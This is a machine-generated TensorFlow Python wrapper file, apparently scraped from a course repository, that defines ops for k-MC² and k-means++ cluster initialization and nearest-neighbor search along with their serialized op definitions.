] | permissive | ishatserka/MachineLearningAndDataAnalysisCoursera | cdf0f23a58617e17d6b938e3a9df17daae8585e4 | e82e772df2f4aec162cb34ac6127df10d14a625a | refs/heads/master | 2021-09-11T01:39:26.228392 | 2018-04-05T14:33:39 | 2018-04-05T14:33:39 | 117,153,454 | 0 | 0 | MIT | 2018-03-27T05:20:37 | 2018-01-11T21:05:33 | Python | UTF-8 | Python | false | false | 8,994 | py | """Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
"""
import collections as _collections
from tensorflow.python.eager import execute as _execute
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import tensor_shape as _tensor_shape
from tensorflow.core.framework import op_def_pb2 as _op_def_pb2
# Needed to trigger the call to _set_call_cpp_shape_fn.
from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.tf_export import tf_export
@tf_export('KMC2ChainInitialization')
def kmc2_chain_initialization(distances, seed, name=None):
r"""Returns the index of a data point that should be added to the seed set.
Entries in distances are assumed to be squared distances of candidate points to
the already sampled centers in the seed set. The op constructs one Markov chain
of the k-MC^2 algorithm and returns the index of one candidate point to be added
as an additional cluster center.
Args:
distances: A `Tensor` of type `float32`.
Vector with squared distances to the closest previously sampled
cluster center for each candidate point.
seed: A `Tensor` of type `int64`.
Scalar. Seed for initializing the random number generator.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `int64`. Scalar with the index of the sampled point.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"KMC2ChainInitialization", distances=distances, seed=seed, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
distances = _ops.convert_to_tensor(distances, _dtypes.float32)
seed = _ops.convert_to_tensor(seed, _dtypes.int64)
_inputs_flat = [distances, seed]
_attrs = None
_result = _execute.execute(b"KMC2ChainInitialization", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"KMC2ChainInitialization", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
@tf_export('KmeansPlusPlusInitialization')
def kmeans_plus_plus_initialization(points, num_to_sample, seed, num_retries_per_sample, name=None):
r"""Selects num_to_sample rows of input using the KMeans++ criterion.
Rows of points are assumed to be input points. One row is selected at random.
Subsequent rows are sampled with probability proportional to the squared L2
distance from the nearest row selected thus far till num_to_sample rows have
been sampled.
Args:
points: A `Tensor` of type `float32`.
Matrix of shape (n, d). Rows are assumed to be input points.
num_to_sample: A `Tensor` of type `int64`.
Scalar. The number of rows to sample. This value must not be
larger than n.
seed: A `Tensor` of type `int64`.
Scalar. Seed for initializing the random number generator.
num_retries_per_sample: A `Tensor` of type `int64`.
Scalar. For each row that is sampled, this parameter
specifies the number of additional points to draw from the current
distribution before selecting the best. If a negative value is specified, a
heuristic is used to sample O(log(num_to_sample)) additional points.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `float32`.
Matrix of shape (num_to_sample, d). The sampled rows.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"KmeansPlusPlusInitialization", points=points,
num_to_sample=num_to_sample, seed=seed,
num_retries_per_sample=num_retries_per_sample, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
points = _ops.convert_to_tensor(points, _dtypes.float32)
num_to_sample = _ops.convert_to_tensor(num_to_sample, _dtypes.int64)
seed = _ops.convert_to_tensor(seed, _dtypes.int64)
num_retries_per_sample = _ops.convert_to_tensor(num_retries_per_sample, _dtypes.int64)
_inputs_flat = [points, num_to_sample, seed, num_retries_per_sample]
_attrs = None
_result = _execute.execute(b"KmeansPlusPlusInitialization", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"KmeansPlusPlusInitialization", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
_nearest_neighbors_outputs = ["nearest_center_indices",
"nearest_center_distances"]
_NearestNeighborsOutput = _collections.namedtuple(
"NearestNeighbors", _nearest_neighbors_outputs)
@tf_export('NearestNeighbors')
def nearest_neighbors(points, centers, k, name=None):
r"""Selects the k nearest centers for each point.
Rows of points are assumed to be input points. Rows of centers are assumed to be
the list of candidate centers. For each point, the k centers that have least L2
distance to it are computed.
Args:
points: A `Tensor` of type `float32`.
Matrix of shape (n, d). Rows are assumed to be input points.
centers: A `Tensor` of type `float32`.
Matrix of shape (m, d). Rows are assumed to be centers.
k: A `Tensor` of type `int64`.
Scalar. Number of nearest centers to return for each point. If k is larger
than m, then only m centers are returned.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (nearest_center_indices, nearest_center_distances).
nearest_center_indices: A `Tensor` of type `int64`. Matrix of shape (n, min(m, k)). Each row contains the
indices of the centers closest to the corresponding point, ordered by
increasing distance.
nearest_center_distances: A `Tensor` of type `float32`. Matrix of shape (n, min(m, k)). Each row contains the
squared L2 distance to the corresponding center in nearest_center_indices.
"""
_ctx = _context.context()
if _ctx.in_graph_mode():
_, _, _op = _op_def_lib._apply_op_helper(
"NearestNeighbors", points=points, centers=centers, k=k, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = None
else:
points = _ops.convert_to_tensor(points, _dtypes.float32)
centers = _ops.convert_to_tensor(centers, _dtypes.float32)
k = _ops.convert_to_tensor(k, _dtypes.int64)
_inputs_flat = [points, centers, k]
_attrs = None
_result = _execute.execute(b"NearestNeighbors", 2, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"NearestNeighbors", _inputs_flat, _attrs, _result, name)
_result = _NearestNeighborsOutput._make(_result)
return _result
def _InitOpDefLibrary(op_list_proto_bytes):
op_list = _op_def_pb2.OpList()
op_list.ParseFromString(op_list_proto_bytes)
_op_def_registry.register_op_list(op_list)
op_def_lib = _op_def_library.OpDefLibrary()
op_def_lib.add_op_list(op_list)
return op_def_lib
# op {
# name: "KMC2ChainInitialization"
# input_arg {
# name: "distances"
# type: DT_FLOAT
# }
# input_arg {
# name: "seed"
# type: DT_INT64
# }
# output_arg {
# name: "index"
# type: DT_INT64
# }
# }
# op {
# name: "KmeansPlusPlusInitialization"
# input_arg {
# name: "points"
# type: DT_FLOAT
# }
# input_arg {
# name: "num_to_sample"
# type: DT_INT64
# }
# input_arg {
# name: "seed"
# type: DT_INT64
# }
# input_arg {
# name: "num_retries_per_sample"
# type: DT_INT64
# }
# output_arg {
# name: "samples"
# type: DT_FLOAT
# }
# }
# op {
# name: "NearestNeighbors"
# input_arg {
# name: "points"
# type: DT_FLOAT
# }
# input_arg {
# name: "centers"
# type: DT_FLOAT
# }
# input_arg {
# name: "k"
# type: DT_INT64
# }
# output_arg {
# name: "nearest_center_indices"
# type: DT_INT64
# }
# output_arg {
# name: "nearest_center_distances"
# type: DT_FLOAT
# }
# }
_op_def_lib = _InitOpDefLibrary(b"\n=\n\027KMC2ChainInitialization\022\r\n\tdistances\030\001\022\010\n\004seed\030\t\032\t\n\005index\030\t\np\n\034KmeansPlusPlusInitialization\022\n\n\006points\030\001\022\021\n\rnum_to_sample\030\t\022\010\n\004seed\030\t\022\032\n\026num_retries_per_sample\030\t\032\013\n\007samples\030\001\nl\n\020NearestNeighbors\022\n\n\006points\030\001\022\013\n\007centers\030\001\022\005\n\001k\030\t\032\032\n\026nearest_center_indices\030\t\032\034\n\030nearest_center_distances\030\001")
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.